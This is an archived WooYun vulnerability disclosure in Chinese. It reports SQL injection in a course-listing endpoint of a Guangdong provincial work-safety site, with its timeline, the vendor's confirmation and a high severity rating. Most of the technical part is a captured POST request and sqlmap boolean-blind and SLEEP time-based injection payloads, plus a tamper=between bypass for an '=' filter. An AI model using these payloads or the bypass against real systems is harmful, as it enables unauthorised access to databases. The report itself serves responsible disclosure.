乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-03: 细节已通知厂商并且等待厂商处理中 2015-12-08: 厂商已经确认,细节仅向厂商公开 2015-12-18: 细节向核心白帽子及相关领域专家公开 2015-12-28: 细节向普通白帽子公开 2016-01-07: 细节向实习白帽子公开 2016-01-21: 细节向公众公开
RT
漏洞系统:广东省安全生产技术中心漏洞地址:
POST /website/course/courseClientList.do HTTP/1.1Host: **.**.**.**Proxy-Connection: keep-aliveContent-Length: 167Cache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Origin: http://**.**.**.**Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36Content-Type: application/x-www-form-urlencodedReferer: http://**.**.**.**/website/course/courseClientList.doAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8Cookie: JSESSIONID=794B160AE2BCC5662797BE5E15E01AF9courseForm.courseId=25773&courseForm.courseCateId=&courseForm.courseInfo.title=&courseForm.courseInfo.teachesr=%E9%99%88%E6%A1%82%E6%88%90&courseForm.courseInfo.hours=
courseForm.courseId参数存在布尔注入和时间盲注
---Parameter: #1* ((custom) POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: courseForm.courseId=25773) AND 1178=1178 AND (4327=4327&courseForm.courseCateId=&courseForm.courseInfo.title=&courseForm.courseInfo.teachesr=%E9%99%88%E6%A1%82%E6%88%90&courseForm.courseInfo.hours= Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: courseForm.courseId=25773) AND (SELECT * FROM (SELECT(SLEEP(5)))HRff) AND (6060=6060&courseForm.courseCateId=&courseForm.courseInfo.title=&courseForm.courseInfo.teachesr=%E9%99%88%E6%A1%82%E6%88%90&courseForm.courseInfo.hours=---[15:34:21] [WARNING] changes made by tampering scripts are not included in shown payload content(s)[15:34:21] [INFO] the back-end DBMS is MySQLback-end DBMS: MySQL 5.0.12
系统过滤了‘=’号,得利用tamper=between绕过涉及8个库
@@
危害等级:高
漏洞Rank:10
确认时间:2015-12-08 14:41
非常感谢您的报告。报告中的问题已确认并复现.影响的数据:高攻击成本:低造成影响:高综合评级为:高,rank:10正在联系相关网站管理单位处置。
暂无